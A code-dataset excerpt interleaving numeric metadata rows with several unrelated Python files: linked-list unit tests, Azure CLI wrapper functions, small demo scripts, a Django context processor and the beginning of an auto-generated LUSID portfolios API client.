| 0.13728
| 0.12288
| 0.1536
| 0.86656
| 0.85568
| 0.83808
| 0.82912
| 0.82912
| 0.8176
| 0
| 0.01193
| 0.481227
| 7,271
| 121
| 151
| 60.090909
| 0.816543
| 0.058864
| 0
| 0.736842
| 0
| 0.026316
| 0.123115
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017544
| false
| 0
| 0.008772
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0b711bb00a84be4abca7380c301fa6fe291a34d
| 6,084
|
py
|
Python
|
SinglyLinkedList/tests.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | 1
|
2021-12-14T19:57:28.000Z
|
2021-12-14T19:57:28.000Z
|
SinglyLinkedList/tests.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | null | null | null |
SinglyLinkedList/tests.py
|
jeremy2918/data-structures
|
17685212aac38979929ca923eb2f9b989c74d07a
|
[
"MIT"
] | null | null | null |
import unittest
from singly_linked_list import SinglyLinkedList, Node
class TestSinglyLinkedList(unittest.TestCase):
    """Unit tests for SinglyLinkedList and its Node helper.

    FIX: the reverse test was previously also named ``test_contains``,
    which redefined (shadowed) the real contains test so it never ran;
    it is now ``test_reverse`` and both tests are discovered.
    """

    def test_node(self):
        """A fresh Node stores its data and has no successor."""
        node = Node(0)
        self.assertEqual(node.data, 0)
        self.assertEqual(node.next, None)

    def test_inti(self):
        """Constructor accepts nothing, a scalar, or an iterable of values."""
        # NOTE: method name is a typo for test_init; kept so external
        # -k filters keep working. unittest still discovers it.
        llist = SinglyLinkedList()
        self.assertEqual(llist.size, 0)
        self.assertEqual(llist.head, None)
        llist = SinglyLinkedList(5)
        self.assertEqual(llist.size, 1)
        self.assertEqual(llist.head.data, 5)
        llist = SinglyLinkedList([1, 2, 3])
        self.assertEqual(llist.size, 3)
        self.assertEqual(llist.head.data, 1)
        self.assertEqual(llist.head.next.data, 2)
        self.assertEqual(llist.head.next.next.data, 3)

    def test_clear(self):
        """clear() empties the list and resets the head."""
        llist = SinglyLinkedList()
        llist.insert_first(0)
        self.assertEqual(llist.size, 1)
        self.assertEqual(llist.head.data, 0)
        llist.clear()
        self.assertEqual(llist.size, 0)
        self.assertEqual(llist.head, None)

    def test_is_empty(self):
        """is_empty() is True only while the list has no nodes."""
        llist = SinglyLinkedList()
        self.assertTrue(llist.is_empty())
        llist.insert_first(0)
        self.assertFalse(llist.is_empty())

    def test_insert_first(self):
        """insert_first() prepends and becomes the new head."""
        llist = SinglyLinkedList()
        llist.insert_first(1)
        self.assertEqual(llist.size, 1)
        self.assertEqual(llist.head.data, 1)
        llist.insert_first(0)
        self.assertEqual(llist.size, 2)
        self.assertEqual(llist.head.data, 0)
        self.assertEqual(llist.head.next.data, 1)

    def test_insert_last(self):
        """insert_last() appends while keeping the head stable."""
        llist = SinglyLinkedList()
        llist.insert_last(0)
        self.assertEqual(llist.size, 1)
        self.assertEqual(llist.head.data, 0)
        llist.insert_last(1)
        self.assertEqual(llist.size, 2)
        self.assertEqual(llist.head.data, 0)
        self.assertEqual(llist.head.next.data, 1)

    def test_insert_at(self):
        """insert_at() inserts at an index and rejects out-of-range indices."""
        llist = SinglyLinkedList()
        self.assertRaises(Exception, llist.insert_at, 1, 0)
        llist.insert_at(0, 0)
        self.assertEqual(llist.size, 1)
        self.assertEqual(llist.head.data, 0)
        llist.insert_at(0, -1)
        self.assertEqual(llist.size, 2)
        self.assertEqual(llist.head.data, -1)
        self.assertEqual(llist.head.next.data, 0)
        llist.insert_at(2, 1)
        self.assertEqual(llist.size, 3)
        self.assertEqual(llist.head.data, -1)
        self.assertEqual(llist.head.next.data, 0)
        self.assertEqual(llist.head.next.next.data, 1)

    def test_peek_first(self):
        """peek_first() returns the head value; raises on an empty list."""
        llist = SinglyLinkedList()
        self.assertRaises(Exception, llist.peek_first)
        llist.insert_first(0)
        self.assertEqual(llist.peek_first(), 0)
        llist.insert_first(-1)
        self.assertEqual(llist.peek_first(), -1)

    def test_peek_last(self):
        """peek_last() returns the tail value; raises on an empty list."""
        llist = SinglyLinkedList()
        self.assertRaises(Exception, llist.peek_last)
        llist.insert_first(0)
        self.assertEqual(llist.peek_last(), 0)
        llist.insert_first(-1)
        self.assertEqual(llist.peek_last(), 0)

    def test_remove_first(self):
        """remove_first() pops the head and returns its value."""
        llist = SinglyLinkedList()
        self.assertRaises(Exception, llist.remove_first)
        llist.insert_last(0)
        llist.insert_last(1)
        llist.insert_last(2)
        self.assertEqual(llist.remove_first(), 0)
        self.assertEqual(llist.size, 2)
        self.assertEqual(llist.head.data, 1)
        self.assertEqual(llist.remove_first(), 1)
        self.assertEqual(llist.size, 1)
        self.assertEqual(llist.head.data, 2)
        self.assertEqual(llist.remove_first(), 2)
        self.assertEqual(llist.size, 0)
        self.assertEqual(llist.head, None)

    def test_remove_last(self):
        """remove_last() pops the tail and returns its value."""
        llist = SinglyLinkedList()
        self.assertRaises(Exception, llist.remove_last)
        llist.insert_last(0)
        llist.insert_last(1)
        llist.insert_last(2)
        self.assertEqual(llist.remove_last(), 2)
        self.assertEqual(llist.size, 2)
        self.assertEqual(llist.head.next.next, None)
        self.assertEqual(llist.remove_last(), 1)
        self.assertEqual(llist.size, 1)
        self.assertEqual(llist.head.next, None)
        self.assertEqual(llist.remove_last(), 0)
        self.assertEqual(llist.size, 0)
        self.assertEqual(llist.head, None)

    def test_remove(self):
        """remove(value) deletes the matching node anywhere in the list."""
        llist = SinglyLinkedList()
        self.assertRaises(Exception, llist.remove)
        llist.insert_last(0)
        llist.insert_last(1)
        llist.insert_last(2)
        llist.insert_last(3)
        self.assertEqual(llist.remove(0), 0)
        self.assertEqual(llist.size, 3)
        self.assertEqual(llist.head.data, 1)
        self.assertEqual(llist.remove(2), 2)
        self.assertEqual(llist.size, 2)
        self.assertEqual(llist.head.data, 1)
        self.assertEqual(llist.head.next.data, 3)
        self.assertEqual(llist.remove(3), 3)
        self.assertEqual(llist.size, 1)
        self.assertEqual(llist.head.data, 1)
        self.assertEqual(llist.head.next, None)
        self.assertEqual(llist.remove(1), 1)
        self.assertEqual(llist.size, 0)
        self.assertEqual(llist.head, None)

    def test_index_of(self):
        """index_of() returns the position of a value, or -1 if absent."""
        llist = SinglyLinkedList()
        llist.insert_last(0)
        llist.insert_last(1)
        llist.insert_last(2)
        self.assertEqual(llist.index_of(0), 0)
        self.assertEqual(llist.index_of(1), 1)
        self.assertEqual(llist.index_of(2), 2)
        self.assertEqual(llist.index_of(3), -1)

    def test_contains(self):
        """contains() reports membership of a value."""
        llist = SinglyLinkedList()
        llist.insert_first(0)
        self.assertTrue(llist.contains(0))
        self.assertFalse(llist.contains(1))

    def test_reverse(self):
        """reverse() flips the node order in place (was misnamed test_contains)."""
        llist = SinglyLinkedList()
        llist.insert_last(1)
        llist.insert_last(2)
        llist.insert_last(3)
        llist.reverse()
        self.assertEqual(llist.head.data, 3)
        self.assertEqual(llist.head.next.data, 2)
        self.assertEqual(llist.head.next.next.data, 1)
# Run the whole suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
| 32.361702
| 59
| 0.636423
| 755
| 6,084
| 5.015894
| 0.062252
| 0.30103
| 0.390811
| 0.215474
| 0.859255
| 0.801162
| 0.772379
| 0.72564
| 0.593346
| 0.546607
| 0
| 0.025402
| 0.242932
| 6,084
| 187
| 60
| 32.534759
| 0.796787
| 0
| 0
| 0.606452
| 0
| 0
| 0.001315
| 0
| 0
| 0
| 0
| 0
| 0.554839
| 1
| 0.096774
| false
| 0
| 0.012903
| 0
| 0.116129
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f0c50d880cd081a33d975ac8dc296bc775722dfd
| 3,183
|
py
|
Python
|
test/pyaz/network/application_gateway/http_settings/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/network/application_gateway/http_settings/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/network/application_gateway/http_settings/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def list(resource_group, gateway_name):
    """List an application gateway's HTTP settings via the `az` CLI.

    :param resource_group: name of the Azure resource group
    :param gateway_name: name of the application gateway
    :return: parsed JSON output of the command
    :raises Exception: with the captured stderr when the command emits no stdout

    FIX: removed the `print(stdout)` / `print(stderr)` statements that sat
    after `return` / `raise` — they were unreachable dead code.
    """
    params = get_params(locals())
    command = "az network application-gateway http-settings list " + params
    print(command)
    # NOTE: shell=True on a string built from caller-supplied params —
    # inputs must be trusted or sanitized upstream.
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def show(resource_group, gateway_name, name):
    """Show one HTTP settings entry of an application gateway via the `az` CLI.

    :param resource_group: name of the Azure resource group
    :param gateway_name: name of the application gateway
    :param name: name of the HTTP settings entry
    :return: parsed JSON output of the command
    :raises Exception: with the captured stderr when the command emits no stdout

    FIX: removed the unreachable `print(stdout)` / `print(stderr)` statements
    that followed `return` / `raise`.
    """
    params = get_params(locals())
    command = "az network application-gateway http-settings show " + params
    print(command)
    # NOTE: shell=True on a string built from caller-supplied params —
    # inputs must be trusted or sanitized upstream.
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def delete(resource_group, gateway_name, name, no_wait=None):
    """Delete an HTTP settings entry of an application gateway via the `az` CLI.

    :param resource_group: name of the Azure resource group
    :param gateway_name: name of the application gateway
    :param name: name of the HTTP settings entry
    :param no_wait: do not wait for the long-running operation to finish
    :return: parsed JSON output of the command
    :raises Exception: with the captured stderr when the command emits no stdout

    FIX: removed the unreachable `print(stdout)` / `print(stderr)` statements
    that followed `return` / `raise`.
    """
    params = get_params(locals())
    command = "az network application-gateway http-settings delete " + params
    print(command)
    # NOTE: shell=True on a string built from caller-supplied params —
    # inputs must be trusted or sanitized upstream.
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def create(resource_group, gateway_name, name, port, probe=None, protocol=None, cookie_based_affinity=None, timeout=None, connection_draining_timeout=None, host_name=None, host_name_from_backend_pool=None, affinity_cookie_name=None, enable_probe=None, path=None, auth_certs=None, root_certs=None, no_wait=None):
    """Create an HTTP settings entry on an application gateway via the `az` CLI.

    All keyword arguments map one-to-one onto the corresponding
    `az network application-gateway http-settings create` options.

    :return: parsed JSON output of the command
    :raises Exception: with the captured stderr when the command emits no stdout

    FIX: removed the unreachable `print(stdout)` / `print(stderr)` statements
    that followed `return` / `raise`.
    """
    params = get_params(locals())
    command = "az network application-gateway http-settings create " + params
    print(command)
    # NOTE: shell=True on a string built from caller-supplied params —
    # inputs must be trusted or sanitized upstream.
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def update(resource_group, gateway_name, name, port=None, probe=None, protocol=None, cookie_based_affinity=None, timeout=None, connection_draining_timeout=None, host_name=None, host_name_from_backend_pool=None, affinity_cookie_name=None, enable_probe=None, path=None, auth_certs=None, root_certs=None, set=None, add=None, remove=None, force_string=None, no_wait=None):
    """Update an HTTP settings entry on an application gateway via the `az` CLI.

    All keyword arguments map one-to-one onto the corresponding
    `az network application-gateway http-settings update` options
    (including the generic --set/--add/--remove/--force-string editors).

    :return: parsed JSON output of the command
    :raises Exception: with the captured stderr when the command emits no stdout

    FIX: removed the unreachable `print(stdout)` / `print(stderr)` statements
    that followed `return` / `raise`.
    """
    params = get_params(locals())
    command = "az network application-gateway http-settings update " + params
    print(command)
    # NOTE: shell=True on a string built from caller-supplied params —
    # inputs must be trusted or sanitized upstream.
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
| 43.013514
| 368
| 0.702482
| 408
| 3,183
| 5.355392
| 0.166667
| 0.064073
| 0.045767
| 0.05492
| 0.921281
| 0.897483
| 0.868192
| 0.868192
| 0.868192
| 0.868192
| 0
| 0.00386
| 0.185988
| 3,183
| 73
| 369
| 43.60274
| 0.839444
| 0
| 0
| 0.820896
| 0
| 0
| 0.096136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.029851
| 0
| 0.179104
| 0.223881
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0c999191e15d16526a0ca151847f851f6bc5d85
| 136
|
py
|
Python
|
sikuli-ide/sample-scripts/vdict.sikuli/vdict.py
|
mgrundy/sikuli
|
4adaab7880d2f3e14702ca7287ae9c9e4f4de9ab
|
[
"MIT"
] | 1,292
|
2015-01-09T17:48:46.000Z
|
2022-03-30T20:08:15.000Z
|
sikuli-ide/sample-scripts/vdict.sikuli/vdict.py
|
mgrundy/sikuli
|
4adaab7880d2f3e14702ca7287ae9c9e4f4de9ab
|
[
"MIT"
] | 31
|
2015-01-20T15:01:24.000Z
|
2022-03-03T11:02:06.000Z
|
sikuli-ide/sample-scripts/vdict.sikuli/vdict.py
|
mgrundy/sikuli
|
4adaab7880d2f3e14702ca7287ae9c9e4f4de9ab
|
[
"MIT"
] | 267
|
2015-02-08T19:51:25.000Z
|
2022-03-19T22:16:01.000Z
|
# Sikuli sample script (Python 2): presumably demonstrates VDict, a
# dictionary keyed by screenshot images — TODO confirm against Sikuli docs.
d = VDict()
d["1254083940668.png"] = "hello"
print d["1254083940668.png"]
# get1: semantics not visible here; presumably returns a single best match
# for the key image — TODO confirm.
print d.get1("1254083940668.png")
# Lookup with a different image; behavior for a non-matching key is not
# shown in this file — TODO confirm whether it raises or fuzzy-matches.
print d["1254085132550.png"]
| 27.2
| 33
| 0.720588
| 19
| 136
| 5.157895
| 0.421053
| 0.489796
| 0.346939
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.424
| 0.080882
| 136
| 5
| 34
| 27.2
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0.532847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.6
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
f0e82c3542a2116b42faccc68cb072914814ca6e
| 106
|
py
|
Python
|
test/test_view.py
|
bressanmarcos/PythonApp
|
5c5717fb776f5b3b574a9aebd6041368cd7473a1
|
[
"MIT"
] | null | null | null |
test/test_view.py
|
bressanmarcos/PythonApp
|
5c5717fb776f5b3b574a9aebd6041368cd7473a1
|
[
"MIT"
] | null | null | null |
test/test_view.py
|
bressanmarcos/PythonApp
|
5c5717fb776f5b3b574a9aebd6041368cd7473a1
|
[
"MIT"
] | null | null | null |
from view.view import View # pylint: disable=no-name-in-module,import-error
def test_model():
    """Placeholder test; intentionally performs no checks yet."""
| 17.666667
| 76
| 0.726415
| 17
| 106
| 4.470588
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160377
| 106
| 5
| 77
| 21.2
| 0.853933
| 0.433962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
0b0ae4ac155ff26ebee6bf09e7f473800b132152
| 227
|
py
|
Python
|
Intermediate/Day6/3ListComprehensionsDemos/listcomprehensiondemo1.py
|
vishipayyallore/LearningPython_2019
|
f72d5af61ad96721442b7ebfc33518c2a879eb64
|
[
"MIT"
] | null | null | null |
Intermediate/Day6/3ListComprehensionsDemos/listcomprehensiondemo1.py
|
vishipayyallore/LearningPython_2019
|
f72d5af61ad96721442b7ebfc33518c2a879eb64
|
[
"MIT"
] | null | null | null |
Intermediate/Day6/3ListComprehensionsDemos/listcomprehensiondemo1.py
|
vishipayyallore/LearningPython_2019
|
f72d5af61ad96721442b7ebfc33518c2a879eb64
|
[
"MIT"
] | null | null | null |
# List-comprehension demos over 1..10: identity, doubles, cubes, squares.
numbers = list(range(1, 11))
print(numbers)
numbers = [2 * n for n in range(1, 11)]
print(numbers)
numbers = [n ** 3 for n in range(1, 11)]
print(numbers)
numbers = [n * n for n in range(1, 11)]
print(f'Squares: {numbers}')
| 17.461538
| 38
| 0.651982
| 46
| 227
| 3.217391
| 0.23913
| 0.216216
| 0.162162
| 0.297297
| 0.844595
| 0.844595
| 0.844595
| 0.844595
| 0.844595
| 0.844595
| 0
| 0.073684
| 0.162996
| 227
| 12
| 39
| 18.916667
| 0.705263
| 0
| 0
| 0.375
| 0
| 0
| 0.079646
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
9bf0ba235887d934eb1ac99082e7ef6b2f2d126a
| 117
|
py
|
Python
|
utils/__init__.py
|
WangXuhongCN/IJCAI20-GNNs
|
ec7d11c5ae2f91f4165e384131c6a8358836ff58
|
[
"MIT"
] | 3
|
2020-05-12T06:05:56.000Z
|
2020-06-07T13:56:07.000Z
|
utils/__init__.py
|
WangXuhongCN/IJCAI20-GNNs
|
ec7d11c5ae2f91f4165e384131c6a8358836ff58
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
WangXuhongCN/IJCAI20-GNNs
|
ec7d11c5ae2f91f4165e384131c6a8358836ff58
|
[
"MIT"
] | null | null | null |
from .evaluate import fixed_graph_evaluate, multi_graph_evaluate
from .evaluate import thresholding,baseline_evaluate
| 58.5
| 64
| 0.897436
| 15
| 117
| 6.666667
| 0.533333
| 0.24
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068376
| 117
| 2
| 65
| 58.5
| 0.917431
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9bf698ba4d9ac0e464264c4f96ec7e275cbb97aa
| 1,408
|
py
|
Python
|
_src/doxygen/test_template_annotator.py
|
Yashwants19/mlpack.org
|
74ca59002a72a3f891564ddddd8a7776086af5ab
|
[
"MIT"
] | null | null | null |
_src/doxygen/test_template_annotator.py
|
Yashwants19/mlpack.org
|
74ca59002a72a3f891564ddddd8a7776086af5ab
|
[
"MIT"
] | null | null | null |
_src/doxygen/test_template_annotator.py
|
Yashwants19/mlpack.org
|
74ca59002a72a3f891564ddddd8a7776086af5ab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
from template_annotator import TemplateAnnotator
t = TemplateAnnotator()
a = t.grammar.parseString('template < typename A >')
print a.asXML('div')
print ''
#a = t.grammar.parseString('template < >')
#print a.asXML('div')
#print ''
a = t.grammar.parseString('template < typename A, typename B >')
print a.asXML('div')
print ''
a = t.grammar.parseString('template<typename A>')
print a.asXML('div')
print ''
a = t.grammar.parseString("template<typename VecType >")
print a.asXML('div')
print ''
a = t.grammar.parseString("template<typename MetricType, typename StatisticType = EmptyStatistic, typename MatType = arma::mat >")
print a.asXML('div')
print ''
a = t.grammar.parseString('template < template < typename A > class B >')
print a.asXML('div')
print ''
a = t.grammar.parseString('template<typename MetricType, typename StatisticType = EmptyStatistic, typename MatType = arma::mat, template< typename BoundMetricType > class BoundType = bound::HRectBound, template< typename SplitBoundType, typename SplitMatType > class SplitType = MidpointSplit >')
#a = t.grammar.parseString('template<template< typename BoundMetricType > class BoundType = bound::HRectBound, template< typename SplitBoundType, typename SplitMatType > class SplitType = MidpointSplit >')
print a.asXML('div')
print ''
| 32
| 314
| 0.733665
| 186
| 1,408
| 5.548387
| 0.188172
| 0.087209
| 0.19186
| 0.174419
| 0.908915
| 0.906008
| 0.887597
| 0.887597
| 0.887597
| 0.841085
| 0
| 0
| 0.115057
| 1,408
| 43
| 315
| 32.744186
| 0.82825
| 0.222301
| 0
| 0.695652
| 0
| 0.086957
| 0.548624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.043478
| null | null | 0.608696
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
5029d6f959025ea6d0a23428a37f7e90ee7b6aa6
| 75
|
py
|
Python
|
Revether/revether.py
|
Revether/Revether
|
06c6e1e9cc4578cc01ea57481087eaf69ae099d7
|
[
"BSD-3-Clause"
] | 1
|
2019-10-01T18:43:39.000Z
|
2019-10-01T18:43:39.000Z
|
Revether/revether.py
|
Revether/Revether
|
06c6e1e9cc4578cc01ea57481087eaf69ae099d7
|
[
"BSD-3-Clause"
] | 2
|
2019-10-01T09:04:28.000Z
|
2019-10-04T11:29:06.000Z
|
Revether/revether.py
|
Revether/Revether
|
06c6e1e9cc4578cc01ea57481087eaf69ae099d7
|
[
"BSD-3-Clause"
] | null | null | null |
from revether.plugin import Plugin
def PLUGIN_ENTRY():
    """Entry-point hook: construct and hand back the Plugin instance."""
    instance = Plugin()
    return instance
| 18.75
| 34
| 0.76
| 10
| 75
| 5.6
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 75
| 4
| 35
| 18.75
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
506058a494f99e8c552a7ae371a6e8a982481b89
| 104
|
py
|
Python
|
students/context_processors.py
|
Ostap1807/django-studentsdb
|
5f1ed823c6254e066668883149d00a4012a12580
|
[
"MIT"
] | null | null | null |
students/context_processors.py
|
Ostap1807/django-studentsdb
|
5f1ed823c6254e066668883149d00a4012a12580
|
[
"MIT"
] | 1
|
2017-12-13T16:26:58.000Z
|
2017-12-13T16:26:58.000Z
|
students/context_processors.py
|
Ostap1807/django-studentsdb
|
5f1ed823c6254e066668883149d00a4012a12580
|
[
"MIT"
] | 1
|
2019-09-24T13:08:17.000Z
|
2019-09-24T13:08:17.000Z
|
from .util import get_groups
def groups_processor(request):
    """Context processor exposing the group list as the GROUPS template variable."""
    groups = get_groups(request)
    return {'GROUPS': groups}
| 20.8
| 42
| 0.759615
| 14
| 104
| 5.428571
| 0.642857
| 0.236842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134615
| 104
| 4
| 43
| 26
| 0.844444
| 0
| 0
| 0
| 0
| 0
| 0.057692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
acbd4656c58bc6b7459c7d826d2ce360bfd7e392
| 134,774
|
py
|
Python
|
sdk/lusid/api/portfolios_api.py
|
finbourne/lusid-sdk-python
|
d238c5c661908639dab57d026966630448bfb0d6
|
[
"MIT"
] | 6
|
2018-06-19T15:50:17.000Z
|
2022-03-26T22:53:16.000Z
|
sdk/lusid/api/portfolios_api.py
|
finbourne/lusid-sdk-python
|
d238c5c661908639dab57d026966630448bfb0d6
|
[
"MIT"
] | 41
|
2019-02-08T09:18:04.000Z
|
2022-02-09T16:20:46.000Z
|
sdk/lusid/api/portfolios_api.py
|
finbourne/lusid-sdk-python
|
d238c5c661908639dab57d026966630448bfb0d6
|
[
"MIT"
] | 7
|
2019-09-03T15:38:27.000Z
|
2021-04-02T10:30:32.000Z
|
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3648
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lusid.api_client import ApiClient
from lusid.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class PortfoliosApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Bind the API client, creating a default ApiClient when none is given."""
    if api_client is None:
        api_client = ApiClient()
    self.api_client = api_client
def delete_portfolio(self, scope: str, code: str, **kwargs):  # noqa: E501
    """DeletePortfolio: Delete portfolio  # noqa: E501

    Delete a particular portfolio. The deletion will take effect from the portfolio's creation datetime. This means that the portfolio will no longer exist at any effective datetime, as per the asAt datetime of deletion.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_portfolio(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: DeletedEntityResponse
    """
    # Request only the deserialized body (not the (data, status, headers)
    # tuple) from the *_with_http_info variant, then delegate to it.
    kwargs['_return_http_data_only'] = True
    return self.delete_portfolio_with_http_info(scope, code, **kwargs)  # noqa: E501
def delete_portfolio_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """DeletePortfolio: Delete portfolio  # noqa: E501

    Delete a particular portfolio. The deletion will take effect from the portfolio's creation datetime. This means that the portfolio will no longer exist at any effective datetime, as per the asAt datetime of deletion.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_portfolio_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param async_req: Whether to execute the request asynchronously.
